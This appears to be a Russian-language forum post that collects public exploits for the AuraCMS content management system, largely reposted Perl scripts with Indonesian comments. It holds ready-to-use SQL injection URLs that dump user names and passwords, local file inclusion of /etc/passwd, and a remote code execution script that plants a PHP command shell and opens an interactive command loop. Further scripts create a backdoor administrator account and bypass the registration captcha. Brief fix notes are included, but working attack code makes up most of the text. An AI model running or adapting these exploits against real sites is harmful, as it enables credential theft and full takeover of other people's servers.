AuraCMS [Forum Module] Remote SQL Injection Vulnerability SQL инъекция в модуле Forum. Уязвимость существует из-за отсутствия фильтрации в скрипте komentar.php (сроки 27-29) данных полученных в переменной $id. Благодаря этой уязвимости существует возможность выполнять произвольные запросы в БД. Уязвимость нашёл чел с ником k1tk4t. Уязвимый запрос: PHP: select topikid, subjek, pengirim,reply, waktu, isi from ".$prefix."forum_topik where topikid=$id"); Exploit: Code: http://localhost/AuraCMS/?pilih=forum&mod=yes&aksi=komentar&id=-9%20union%20select%201,user,id,4,email,password%20from%20user/* ========================================================= AuraCMS version 1.5rc - Multiple Remote SQL Injection Vulnerabilities SQL инъекция в скриптах 'hal.php', 'cetak.php', 'lihat.php', 'pesan.php', 'teman.php'. Версия: 1.5rc (возможно более ранние). Уязвимость найдена тем же самым челом с ником k1tk4t. Итак приступим к разбору… hal.php Уязвимый запрос: PHP: $perintah="SELECT * FROM halaman WHERE id=$id"; $hasil = mysql_query( $perintah ); Exploit: Code: http://localhost/auracms15/?pilih=hal&id=-9%20UNION%20SELECT%200,user,password%20from%20user/* ------------------------------------------------------------------------------------------- cetak.php Уязвимый запрос: PHP: $perintah="SELECT * FROM artikel WHERE id=$id AND publikasi=1"; $hasil = mysql_query( $perintah ); Exploit: Code: http://localhost/auracms15/cetak.php?id=-9%20UNION%20SELECT%20null,null,null,password,null,user,null,null%20from%20user/* ------------------------------------------------------------------------------------------- lihat.php Уязвимый запрос: PHP: $perintah="SELECT * FROM artikel WHERE id=$id AND publikasi=1"; $hasil = mysql_query( $perintah ); Exploit: Code: http://localhost/AuraCMS1.5/?pilih=lihat&id=-9%20UNION%20SELECT%20null,user,password,null,null,null,null,null%20from%20user/* ------------------------------------------------------------------------------------------- 'pesan.php Уязвимый запрос: PHP: $perintah="SELECT * FROM artikel WHERE id=$id AND publikasi=1"; } else { $perintah="SELECT * FROM komentar WHERE id=$id"; Exploit: Code: http://localhost/AuraCMS1.5/?pilih=pesan&id=-9%20UNION%20SELECT%20null,null,null,concat(user,0x3a,password),null,null,null,null%20from%20user/* ---------------------------------------------------- teman.php Уязвимый запрос: PHP: $perintah="SELECT * FROM artikel WHERE id=$id AND publikasi=1"; $hasil = mysql_query( $perintah ); Exploit: Code: http://localhost/AuraCMS1.5/?pilih=teman&id=-9%20UNION%20SELECT%20null,concat(user,0x3a,password),null,null,null,null,null,null%20from%20user/* ===================================================== AuraCMS 2.1 - Remote File Attachment - Local File Inclusion Local File Inclusion (Локальный инклуд). Найдена данная бага тем самым челом k1tk4t. Веосия 2.1 (возможно более ранние). Уязвимость в скрипте '/mod/contak.php'. Уязвимый код: PHP: if ($_POST['submit']) { $nama = text_filter($_POST['nama']); $email = text_filter($_POST['email']); $pesan = nl2br(text_filter($_POST['pesan'], 2)); $images = text_filter($_POST['image']); checkemail($email); $gfx_check = intval($_POST['gfx_check']); if (!$nama) $error .= "Error: Please enter your name!<br />"; if (!$pesan) $error .= "Error: Please enter a message!<br />"; $code = substr(hexdec(md5("".date("F j")."".$_POST['random_num']."".$sitekey."")), 2, 6); if (extension_loaded("gd") AND $code != $_POST['gfx_check']) $error .= "Error: Security Code Invalid<br />"; if ($error) { $tengah.='<table width="100%" border="0" cellspacing="0" cellpadding="0" class="middle"><tr><td><table width="100%" class="bodyline"><tr><td align="left"><img src="images/warning.gif" border="0"></td><td align="center"><font class="option">'.$error.'</font></td><td align="right"><img src="images/warning.gif" border="0"></td></tr></table></td></tr></table>'; } else { if (!empty ($image_name)){ $image_name = $_FILES['image']['name']; $image_temp = $_FILES['image']['tmp_name']; $tempat = "files/"; @copy($_FILES[image][tmp_name], "./files/".$image_name); if(@copy($_FILES[image][tmp_name], "./files/".$image_name)){ unlink($image); $sukses = "Sukses Upload File ".$image_name; }else{ $sukses = "Gagal Upload File ".$image_name; Exploit: Code: http://localhost/auracms2.1/index.php?pilih=../mod/contak ------------------------------------------------------------------------------------------- Скрипт index.php Уязвимый код: PHP: if (isset ($_GET['mod'])) $mod = $_GET['mod'] ; else $mod = ''; if(!isset($_GET['pilih'])){ include 'content/normal.php'; }else { if($mod == "yes" && file_exists("mod/$_GET[pilih].php")){ include "mod/$_GET[pilih].php"; } else { if (eregi('http://', $_GET['pilih']) or !file_exists("content/$_GET[pilih].php") or $_GET['pilih'] == 'index'){ $_GET['pilih'] = 'normal'; Exploit: Code: http://localhost/auracms.x.x/index.php?pilih=../../../../../../../etc/passwd%00 --------------------------------------------------------------------------------------------- Скрипт index.php (Версия 1.x) Уязвимый код: PHP: <? if(!isset($pilih))$pilih=''; switch($pilih){ case '': include "normal.php"; break; default: if($mod == "yes" && file_exists("mod/$pilih.php")){ include "mod/$pilih.php"; } else { if (eregi('http://', $pilih) or !file_exists("$pilih.php")){ $pilih = 'normal'; } include "$pilih.php"; } break; } ?> Exploit: Code: http://localhost/auracms.x.x/index.php?pilih=../../../../../../../etc/passwd%00 ========================================================== AuraCMS 1.62 - (stat.php) Remote Code Execution Exploit Выполнение произвольного кода. Уязвимый скрипт stat.php. Версия 1.62 (возможно более ранние) Exploit: PHP: #!/usr/bin/perl # # Indonesian Newhack Security Advisory # ------------------------------------ # AuraCMS 1.62 - (stat.php) Remote Code Execution Exploit # Waktu : Jan 16 2008 10:00PM # Software : AuraCMS 1.62 # AuraCMS Mod Block Statistik | http://iwan.or.id/download/lihat/1/2-1-6.html # Vendor : http://www.auracms.org/ # Ditemukan oleh : k1tk4t | http://newhack.org # Lokasi : Indonesia # Penjelasan : # # Kutu pada berkas "stat.php" didalam direktori /mod pada aplikasi web auracms 1.62 # ---//--- # 17. Function User_Online ($minutes, $NamaFile){ # 18. //$ip = $REMOTE_ADDR; # 19. $ip = getenv("HTTP_X_FORWARDED_FOR"); # 20. if (getenv("HTTP_X_FORWARDED_FOR") == ''){ # 21. $ip = getenv("REMOTE_ADDR"); # 22. } # ---//--- # 47. fseek($f,0,SEEK_SET); # 48. ftruncate($f,0); # 49. array_pop($user); # 50. foreach ($user as $line) # 51. { # 52. list($savedip,$savedtime) = split("\|",$line); # 53. if ($savedip == $ip) {$savedtime = $time;$found = 1;} # 54. if ($time < $savedtime + ($minutes * 60)) # 55. { # 56. fputs($f,"$savedip|$savedtime\n"); # 57. $users = $users + 1; # 58. } # 59. } # 60. # 61. if ($found == 0) # 62. { # 63. fputs($f,"$ip|$time\n"); # 64. $users = $users + 1; # 65. } # 66. # 67. fclose ($f); # ---//--- # # Sebagai Contoh; # $ip = getenv("HTTP_X_FORWARDED_FOR"); # $ip = <?php phpinfo() ?> # <-- user menginjeksi phpinfo # format yang tersimpan # <?php phpinfo() ?>|WAKTUBERKUNJUNG # # pada AuraCMS versi 1.62, log di simpan pada berkas /mod/online.db.txt [Default] # # pada Mod Block Statistik, log disimpan pada berkas /logs/online.db.txt [Default] # # pada AuraCMS versi 2.x mod "online", getenv("HTTP_X_FORWARDED_FOR") bisa berakibat terjadinya "SQL Injection" # # => "Perbaikan Kutu stat.php" # ---//--- # 19. $ip = getenv("HTTP_X_FORWARDED_FOR"); # 20. if (preg_match('/^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$/', getenv("HTTP_X_FORWARDED_FOR")) == ''){ # 21. $ip = getenv("REMOTE_ADDR"); # 22. } # ---//--- # # Exploit ini dibuat untuk pembelajaran, pengetesan dan pembuktian dari apa yang kami pelajari, # saya[k1tk4t] dan "Indonesian Newhack Technology" tidak bertanggung jawab akan kerusakan # yang diakibatkan dari penyalahgunaan exploit oleh pihak lain # # => # Terima Kasih untuk; # -[opt1lc, fl3xu5, ghoz]- # str0ke, DNX, xoron, y3dips, L41n, cyb3rh3b, K-159, the_hydra, NoGe # nyubi, iFX, sin~X, k1n9k0ng, bius, selikoer, aldy_BT # Komunitas Security dan Hacker Indonesia # # ----------------------------[Mulai]------------------------------------ use IO::Socket; if(!$ARGV[2]) { print "\n |-------------------------------------------------------|"; print "\n | Indonesian Newhack Technology |"; print "\n |-------------------------------------------------------|"; print "\n | AuraCMS 1.62 (stat.php) Remote Code Execution Exploit |"; print "\n | Coded by k1tk4t |"; print "\n |-------------------------------------------------------|"; print "\n[!] "; print "\n[!] Penggunaan : perl auracms22.pl [Site] [Path] [Port]"; print "\n[!] Contoh : perl auracms22.pl localhost /aura162/ 80"; print "\n[!] "; print "\n"; exit; } $oriserver = $ARGV[0]; $orihost = "http://".$oriserver; $oridir = $ARGV[1]; $oriport = $ARGV[2]; print "- Melakukan Koneksi $orihost$oridir\r\n"; $injurl = "index.php?pilih=stat&mod=yes"; $injeksi = $oridir.$injurl; $kodeterlarang = "<?php echo t4mugel4p;error_reporting(0);set_time_limit(0);if (get_magic_quotes_gpc()){\$_GET[cmd]=stripslashes(\$_GET[cmd]);}passthru(\$_GET[cmd]);die;?>"; print "- Sedang menginjeksi kode jahat\r\n"; $injkode = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$oriserver", PeerPort => "$oriport") || die "- Koneksi Gagal...\r\n"; print $injkode "GET ".$injeksi." HTTP/1.1\n"; print $injkode "Host: ".$oriserver."\r\n"; print $injkode "X-Forwarded-For: ".$kodeterlarang."\r\n"; print $injkode "\r\n\r\n"; close ($injkode); while($perintah !~ "mati") { $ekseurl = "index.php?pilih=online.db.txt%00&mod=yes&cmd=".$perintah.""; $eksekusi = $oridir.$ekseurl; print "- Sedang mencoba menjalankan kode injeksi\r\n"; $eksekode = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$oriserver", PeerPort => "$oriport") || die "- Koneksi Gagal...\r\n"; print $eksekode "GET ".$eksekusi." HTTP/1.1\n"; print $eksekode "Host: ".$oriserver."\r\n"; print $eksekode "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"; print $eksekode "Accept: */*\r\n"; print $eksekode "Connection: close\r\n\n"; while ($hasil = <$eksekode>) { print $hasil; } print "[+]perintah => "; $perintah = <STDIN>; } # milw0rm.com [2008-01-18]
AuraCMS 2.2 - (admin_users.php) Remote Add Administrator Exploit PHP: #!/usr/bin/perl # # Indonesian Newhack Security Advisory # ------------------------------------ # AuraCMS 2.2 - (admin_users.php) Remote Add Administrator Exploit # Waktu : Dec 25 2007 04:50AM # Software : AuraCMS 2.2 # Vendor : http://www.auracms.org/ # Ditemukan oleh : k1tk4t | http://newhack.org # Lokasi : Indonesia # Penjelasan : # # Kutu pada berkas "admin_users.php" # coba kita lihat ; # 01. <? # 02. if(ereg(basename (__FILE__), $_SERVER['PHP_SELF'])) # 03. { # 04. header("HTTP/1.1 404 Not Found"); # 05. exit; # 06. } # ---//--- # 12. if (!cek_login()){ # 13. header("location: index.php"); # 14. exit; # 15. } else{ # ---//---- # Ada yang menarik pada berkas "admin_users.php", pada baris 02 - 06 sebenarnya berkas ini sudah cukup aman # karena jika berkas ini dipanggil langsung dari browser [http://target.com/admin/admin_users.php] akan menjawab Not Found dan Keluar # mmm....!!! coba perhatikan baris 12 - 15, jika "cek_login()" maka akan meneruskan ke perintah2 berikutnya. # Disinilah kita mencoba 'bermain' ;) # fungsi "cek_login()" ini hanya mengecek status login melalui session cookie, dengan semua level login [user,editor,administrator] # Sehingga "admin_users.php" dapat di akses oleh user dengan level apa saja[tidak untuk TAMU], # # => Lantas Bagaimana Mengaksesnya, bukankah berkas "admin_users.php" tidak bisa dipanggil langsung [Baris 02 - 06] ? # yup benar ;) "admin_users.php" tidak bisa di panggil langsung melalui browser, sekarang coba kita lihat pada berkas "index.php" ; # ---//--- # 71. if(!isset($_GET['pilih'])){ # 72. include 'content/normal.php'; # 73. }else if (@$_GET['mod'] == 'yes' && file_exists('mod/'.@$_GET['pilih'].'/'.@$_GET['pilih'].'.php') && !isset($_GET['act']) && !preg_match("/\.\./",$_GET['pilih'])) { # 74. include 'mod/'.$_GET['pilih'].'/'.$_GET['pilih'].'.php'; # 75. }else if (@$_GET['mod'] == 'yes' && file_exists('mod/'.@$_GET['pilih'].'/'.@$_GET['act'].'.php') && !preg_match("/\.\./",$_GET['pilih'])) { # 76. include 'mod/'.@$_GET['pilih'].'/'.@$_GET['act'].'.php'; # 77. }else if(!isset($_GET['mod']) && !isset($_GET['act']) && file_exists('content/'.$_GET['pilih'].'.php') && !preg_match("/\.\./",$_GET['pilih'])) { # 78. include 'content/'.$_GET['pilih'].'.php'; # 79. }else { # 80. header("location: index.php"); # 81. exit; # 82. } # ---//--- # mm... perhatikan kode2 tersebut... menarik bukan? # iya dengan berkas "index.php" inilah kita bisa mengakses "admin_users.php" atau dengan kata lain mematahkan baris 02 - 06 pada berkas "admin_users.php", # # => Ooo Gitu..., terus memperbaikinya gmana ? # hehehe... # coba ganti baris 02 - 06 pada berkas "admin_users.php" dengan ; # ---//--- # 02. if (!defined('AURACMS_admin')) { # 03. Header("Location: ../index.php"); # 04. exit; # 04. } # ---//-- # Sebenarnya code tersebut sudah ada pada berkas2 admin lainnya, terkecuali pada berkas ; # "admin_users.php" # "admin_poll.php" # "admin_kalender.php" # # => Ada apa lagi ? # Exploit ini dibuat untuk pengetesan belaka, bukan untuk kegiatan terlarang # saya[k1tk4t] dan "Indonesian Newhack Technology" tidak bertanggung jawab akan kerusakan yang diakibatkan dari penyalahgunaan exploit pada site # # => # Terima Kasih untuk; # -[opt1lc, fl3xu5, ghoz]- # str0ke, DNX, xoron, cyb3rh3b, K-159, the_hydra, y3dips # nyubi,iFX,sin~X,k1n9k0ng,bius,selikoer,aldy_BT # Komunitas Security dan Hacker Indonesia # # ----------------------------[Mulai]------------------------------------ use IO::Socket; if(!$ARGV[4]) { print "\n |--------------------------------------------------------|"; print "\n | Indonesian Newhack Technology |"; print "\n |--------------------------------------------------------|"; print "\n |AuraCMS 2.2 - (admin_users.php) Remote Add Admin Exploit|"; print "\n | Coded by k1tk4t |"; print "\n |--------------------------------------------------------|"; print "\n[!] "; print "\n[!] Buat Account terlebih dahulu pada site target dan pastikan Account tesebut bisa digunakan"; print "\n[!] Username dan Password tadi akan digunakan untuk membuat Account admin dengan exploit ini"; print "\n[!] Penggunaan : perl auracms22.pl [Site] [Path] [Port] [Username] [Password] "; print "\n[!] Contoh : perl auracms22.pl target.com /auracms2.2/ 80 bugtest 123456"; print "\n[!] "; print "\n"; exit; } $oriserver = $ARGV[0]; $orihost = "http://".$oriserver; $oridir = $ARGV[1]; $oriport = $ARGV[2]; $oriuser = $ARGV[3]; $oripass = $ARGV[4]; #Sending data... print "- Melakukan Koneksi $orihost$oridir\r\n\r\n"; logindulu(); sub logindulu () { $ldberkas = "index.php"; $ldlengkap = $oridir.$ldberkas; $lddata = "username=".$oriuser; $lddata.= "&password=".$oripass; $lddata.= "&loguser=1"; $lddata.= "&submit_login=Login"; $lddatajml = length($lddata); $ldkonek = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$oriserver", PeerPort => "$oriport") || die "- Connection failed...\r\n"; print $ldkonek "POST $ldlengkap HTTP/1.1\n"; print $ldkonek "Accept: */*\r\n"; print $ldkonek "Referer: $orihost\r\n"; print $ldkonek "Accept-Language: en-us,en;q=0.5\r\n"; print $ldkonek "Content-Type: application/x-www-form-urlencoded\r\n"; print $ldkonek "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11\r\n"; print $ldkonek "Host: $oriserver\r\n"; print $ldkonek "Content-length: $lddatajml\r\n"; print $ldkonek "Connection: Keep-Alive\r\n"; print $ldkonek "Cache-Control: no-cache\r\n\r\n"; print $ldkonek $lddata; print $ldkonek "\r\n\r\n"; while ($hasil = <$ldkonek>) { if ($hasil =~ /Set-Cookie: (.*?) path=\//) { $ldkonekcookie = $ldkonekcookie.$1; } if ($hasil =~ /<b>$oriuser<\/b>/) { buatadmin(); } } die "- Gagal Login\r\n"; } sub buatadmin () { close ($ldkonek); print "- Membuat User t4mugel4p dengan level Administrator\r\n\r\n"; $baberkas = "index.php?pilih=news&act=../../admin/admin_users&mod=yes&aksi=add"; $balengkap = $oridir.$baberkas; $badata = "user=t4mugel4p"; $badata.= "&password=t4mugel4p"; $badata.= "&email=t4mugel4p%40gelapbanget.gitu"; $badata.= "&level=Administrator"; $badata.= "&tipe=aktif"; $badata.= "&add_users=Add"; $badatajml = length($badata); $bakonek = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$oriserver", PeerPort => "$oriport") || die "- Connection failed...\r\n"; print $bakonek "POST $balengkap HTTP/1.1\r\n"; print $bakonek "Accept: */*\r\n"; print $bakonek "Referer: $orihost.$balengkap\r\n"; print $bakonek "Accept-Language: en-us,en;q=0.5\r\n"; print $bakonek "Content-Type: application/x-www-form-urlencoded\r\n"; print $bakonek "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11\r\n"; print $bakonek "Cookie: $ldkonekcookie\r\n"; print $bakonek "Host: $oriserver\r\n"; print $bakonek "Content-length: $badatajml\r\n"; print $bakonek "Connection: Keep-Alive\r\n"; print $bakonek "Cache-Control: no-cache\r\n\r\n"; print $bakonek $badata; print $bakonek "\r\n\r\n"; while ($hasil = <$bakonek>) { if ($hasil =~ /Data Berhasil Di add/) { print "- Exploiting Selesai dan SUKSES !!!\r\n\r\n"; print "- Login admin menggunakan\r\n" ; print "- Username : t4mugel4p\r\n"; print "- Password : t4mugel4p\r\n\r\n"; print "- Pada site $orihost$ldlengkap\r\n"; exit(); } if ($hasil =~ /(Data Berhasil Di add)/) { print "- Exploit Gagal\r\n"; exit(); } } die "- Exploit Gagal\r\n"; } # milw0rm.com [2007-12-25] ©milw0rm.org Дополнительно: admin.php – собственно админка /include/config.php – конфиг БД: useraura – таблица пользователей Имена полей: UserId user password Пароли шифрованы обычным md5 Сайт разработчиков: http://auracms.org
AuraCMS 2.2 (gallery_data.php) Remote SQL Injection Exploit SQL Injection Vulnerable: AuraCMS 2.2 Exploit: Code: #!/usr/bin/perl use LWP::UserAgent; use HTTP::Cookies; use Getopt::Long; # # [!] Discovered.: DNX # [!] Vendor.....: http://www.auracms.org # [!] Detected...: 19.01.2008 # [!] Reported...: 25.01.2008 # [!] Response...: 30.01.2008 # # [!] Background.: AuraCMS is a CMS based on PHP and SQL # # [!] Bug........: $_GET['albums'] in mod/gallery/ajax/gallery_data.php near line 173 # # 173: case 'detail': # 174: if (isset($_GET['id'])){ # 175: $id = $_GET['id']; # 176: $albums = $_GET['albums']; # # 200: $query = mysql_query ("SELECT * FROM `mod_gallery` WHERE `kid` = '$albums' $SQL_SORT LIMIT $image,$limitimage"); # # [!] Solution...: Install gallery update! # if(!$ARGV[1]) { print "\n \\#'#/ "; print "\n (-.-) "; print "\n ---------------------oOO---(_)---OOo--------------------"; print "\n | AuraCMS v2.2 (gallery_data.php) Remote SQL Injection |"; print "\n | (works only with magic quotes = off) |"; print "\n | coded by DNX |"; print "\n --------------------------------------------------------"; print "\n[!] Usage......: perl aura.pl [Host] [Path] <Options>"; print "\n[!] Example....: perl aura.pl 127.0.0.1 /auracms/"; print "\n[!] Options....:"; print "\n -p [ip:port] Proxy support"; print "\n"; exit; } my $host = $ARGV[0]; my $path = $ARGV[1]; my %options = (); GetOptions(\%options, "p=s"); print "[!] Exploiting...\n"; exploit(); print "\n[!] Exploit done\n"; sub exploit { my $url1 = "http://".$host.$path."index.php?pilih=gallery&mod=yes"; my $url2 = "http://".$host.$path."mod/gallery/ajax/gallery_data.php"; my $ua = LWP::UserAgent->new; my $cookie = HTTP::Cookies->new(); my $regexp = ":\"(.*?)\",\"name\"(.*)([a-fA-F0-9]{32})"; my $res = ""; if($options{"p"}) { $ua->proxy('http', "http://".$options{"p"}); } ############### # exist file? # ############### $res = $ua->get($url2); if(!$res->is_success) { die("[!] Failed, file not found\n"); } ########################## # get cookie from server # ########################## $res = $ua->get($url1); $cookie->extract_cookies($res); $ua->cookie_jar($cookie); $ua->get($url2); $res = $ua->get($url2); ###################### # check magic quotes # ###################### $url2 .= "?action=detail&id=&image=&albums='"; $res = $ua->get($url2); $content = $res->content; if($content =~ /,\"albums\":\[\"\\\\'\"],/) { die("[!] Failed, magic quotes on\n") } ############## # get hashes # ############## $url2 .= "%20union%20select%20user,2,3,4,5,6,7,password,9,10%20from%20useraura/*"; $res = $ua->get($url2); $content = $res->content; my @cont = split(/{\"files\"/, $content); foreach (@cont) { if($_ =~ /$regexp/) { print "$1 $3\n"; } } }
AuraCMS 2.x (user.php) Security Code Bypass / Add Administrator AuraCMS 2.x (user.php) Security Code Bypass / Add Administrator Exploit Exploit: Code: #!/usr/bin/perl # # Indonesian Newhack Security Advisory # ------------------------------------ # AuraCMS 2.x (user.php) - Security Code Bypass & Add Administrator Exploit # Waktu : Feb 28 2008 08:00PM # Software : AuraCMS # Versi : 2.0 # 2.1 # 2.2.1 # Vendor : http://www.auracms.org/ # # ------------------------------------ # Audit Oleh : NTOS-Team # Lokasi : Indonesia | http://newhack.org # Penjelasan : # # Kutu pada berkas "user.php" direktori "/content" #---//--- # 59. if (!$nama || preg_match("/[^a-zA-Z0-9_-]/", $nama)) $error .= "Karakter Username tidak diizinkan kecuali a-z,A-Z,0-9,-, dan _<br />"; # 60. if (strlen($nama) > 10) $error .= "Username Terlalu Panjang Maksimal 10 Karakter<br />"; # 61. if (strrpos($nama, " ") > 0) $error .= "Username Tidak Boleh Menggunakan Spasi"; # 62. if ($koneksi_db->sql_numrows($koneksi_db->sql_query("SELECT user FROM useraura WHERE user='$nama'")) > 0) $error .= "Error: Username ".$nama." sudah terdaftar , silahkan ulangi.<br />"; # 63. if ($koneksi_db->sql_numrows($koneksi_db->sql_query("SELECT user FROM temp_useraura WHERE user='$nama'")) > 0) $error .= "Error: Username ".$nama." sudah terdaftar , silahkan ulangi.<br />"; # 64. if ($koneksi_db->sql_numrows($koneksi_db->sql_query("SELECT email FROM useraura WHERE email='$email'")) > 0) $error .= "Error: Email ".$email." sudah terdaftar , silahkan ulangi.<br />"; # 65. if ($koneksi_db->sql_numrows($koneksi_db->sql_query("SELECT email FROM temp_useraura WHERE email='$email'")) > 0) $error .= "Error: Email ".$email." sudah terdaftar , silahkan ulangi.<br />"; # 66. if (!nama) $error .= "Error: Formulir Nama belum diisi , silahkan ulangi.<br />"; # 67. if ($cekperaturan != "1") $error .= "You should be agree with rules and conditions of use!<br />"; # 68. if (!nama) $error .= "Error: Formulir Nama belum diisi , silahkan ulangi.<br />"; # 69. if (!password) $error .= "Error: Formulir Password belum diisi , silahkan ulangi.<br />"; # 70. if ($password != $rpassword) $error .= "Password and Retype Password Not Macth.<br />"; # 71. if (!country) $error .= "Error: Formulir Negara belum diisi , silahkan ulangi.<br />"; # 72. checkemail($email); # 73. $code = substr(hexdec(md5("".date("F j")."".$_POST['random_num']."".$sitekey."")), 2, 6); # 74. if (extension_loaded("gd") AND $code != $_POST['gfx_check']) $error .= "Error: Security Code Invalid<br />"; # 75. # 76. # 77. if ($error){ # 78. $tengah .='<table width="100%" border="0" cellspacing="0" cellpadding="0" class="middle"><tr><td><table width="100%" class="bodyline"><tr><td align="left"><img src="images/warning.gif" border="0"></td><td align="center"><font class="option">'.$error.'</font></td><td align="right"><img src="images/warning.gif" border="0"></td></tr></table></td></tr></table>'; # 79. }else{ # 80. $hasil1 = $koneksi_db->sql_query("INSERT INTO useraura (user, email, password , level, tipe, negara)VALUES('$nama', '$email', '$password','User','aktif', '$country')" ); # ---//--- # => Security Code Bypass # baris 73 - 74 kode yang menarik,kita coba belah perlahan 2 baris ini # $sitekey sudah terdifinisi di dalam berkas "config.php" direktori "includes" # $_POST['random_num'] nilai acak yang dikirim melalui Form isian registrasi User secara hiden [bukan hasil isian User] # $_POST['gfx_check'] nilai yang dikirim oleh USER melalui Form isian register User mengenai Security Code # dan selengkap nya dapat di baca pada http://ezine.echo.or.id/ezine18/e18.005.txt # # => Add Administrator [INSERT Metode] # baik... kita sudah bisa membypass sekuriti kode, sekarang buat admin baru di site target :p # baris 71. variabel "country" jika tidak diisi hasil nya $error, namun sayang hanya sebatas itu saja aturannya :( # kita lihat pada baris 80. VALUES('$nama', '$email', '$password','User','aktif', '$country') kembali disini tidak ada penyaringan # apa yang kamu pikirkan... mmm... menarik... nakal... jahat... tapi INDAH bukan... ;) # ya... bagaimana kalo kami berpikir seperti ini ; # # VALUES('$nama', '$email', '$password','User','aktif', 'Indonesia['),('Attacker', '[email protected]', 'MD5_Pass', 'Administrator', 'aktif', 'Undergr0und]')" ); # # baru ini namanya p0rn0c0d3..., # satu sesi register 2 user yang di buat, pertama user yang sesuai isian form, yang kedua adalah User dengan Administrator hasil keNAKALan User :D # terima kasih untuk author http://www.milw0rm.com/papers/149 # # => Perbaikan Sederhana # 1. Security Code # Ganti dengan Captcha yang berdasarkan session, dan cari Captcha yang tidak mudah dibaca OCR # 2. Add Administrator # Ganti Kode baris 71. pada berkas "user.php" dengan ; # ---//--- # 71. if (!$country || preg_match("/[^a-zA-Z]/", $country)) $error .= "Error: Formulir Negara belum diisi , silahkan ulangi.<br />"; # ---//--- # # => Perhatian! # "Exploit ini dibuat untuk pembelajaran, pengetesan dan pembuktian dari apa yang kami pelajari" # Segala penyalahgunaan dan kerusakan yang diakibat dari exploit ini bukan tanggung jawab kami # # =>Newhack Technology, OpenSource & Security # ~ NTOS-Team->[fl3xu5,opt1lc] ~ # use Digest::MD5 qw(md5_hex); use LWP::UserAgent; use Getopt::Long; no warnings; if(!$ARGV[1]) { print "\n |--------------------------------------------------|"; print "\n | Indonesian Newhack Technology |"; print "\n |--------------------------------------------------|"; print "\n | AuraCMS <= 2.2.1 (user.php) |"; print "\n | 1.Security Code Bypass |"; print "\n | 2.Add Administrator |"; print "\n | Coded by NTOS-Team |"; print "\n |--------------------------------------------------|"; print "\n | exploit berhasil jika magic_quotes_gpc = off"; print "\n[!] Penggunaan : "; print "\n[>] perl auracms-user.pl [Site] [Path] "; print "\n "; print "\n[!] Contoh : "; print "\n[>] perl auracms-user.pl localhost /auracms2x/"; print "\n "; print "\n"; exit; } $host = $ARGV[0]; $path = $ARGV[1]; $injek = "Indonesia'),('t4mugel4p', 'gelap\@banget.gitu', '213aa1379cce2862538be1c046319684','Administrator','aktif', 'DuniaGelap"; @namabulan = qw(January February March April May June July August September October November December); $sitekey = "x1a1MhphAur4kea7V3Rs820dweOwxIw4n3UgSusyM4nt04"; #defaul sitekey dari config.php $tgl = (localtime)[3]; $bln = (localtime)[4]; $bulan = $namabulan[$bln]; $date = "$bulan $tgl"; ## Breaking Security Code Auracms 2.x $browser = LWP::UserAgent->new() or die(); $getgfx = $browser -> get("http://".$host.$path."?pilih=user&aksi=register",); $get = $getgfx -> content; if ($get =~ /random_num" value="(.*?)"><\/td>/) { $randnum = $1; } $gfx = substr(hex(md5_hex($date.$randnum.$sitekey)), 2, 6); ## Proses Add Administrator $browser = LWP::UserAgent->new() or die(); $postingkomen = $browser -> post( "http://".$host.$path."?pilih=user&aksi=register", [ "nama"=>"t1pu4n", "email"=>"k3tipu\@nie.yea", "password"=>"terimakasih", "rpassword"=>"terimakasih", "country"=>$injek, "gfx_check"=>$gfx, "random_num"=>$randnum, "cekperaturan"=>"1", "submit"=>"Submit", ], ); $komen = $postingkomen -> content; if ($komen =~ />Please Login With Your Username and Your Password</) { print "[+]Sukses Register User\n"; print "[+]Silahkan dicoba login\n"; print "[+]Username : t4mugel4p\n"; print "[+]Password : t4mugel4p\n"; exit();} if ($komen =~ />Error/) { print "[!]Terjadi Kesalahan Pada Proses Register\n"; exit();} print $komen; print "[!]\n Exploit Gagal!!! ;)\n"; © NTOS-Team
